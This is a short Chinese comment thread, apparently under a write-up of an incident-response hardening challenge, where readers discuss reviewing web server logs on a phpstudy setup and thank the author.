      针对这个题来说他给的算很多了,而且针对应急加固来说,对方没有删除日志就能针对性的对日志进行审查能找到很多有用的信息;
      所以作为攻击者来说清理自己的痕迹很重要,对于防御者来说,及时备份跟防护也是极为重要的。

  4. Moon、 Moon、

    师傅麻烦问下,一开始的日志界面是在哪里看到的呢,我一连接上来只看到了一个phpstudy软件呢

    1. bit bit

      这个在文件夹里面找一下,具体在哪里我也忘了,找一下对应的中间件文件夹,然后找到log文件就可以了,很明显能看出哪个是网站的日志的

  5. 睡觉人 睡觉人

    学习了

  6. 大米 大米

    学习了

已有 10 条评论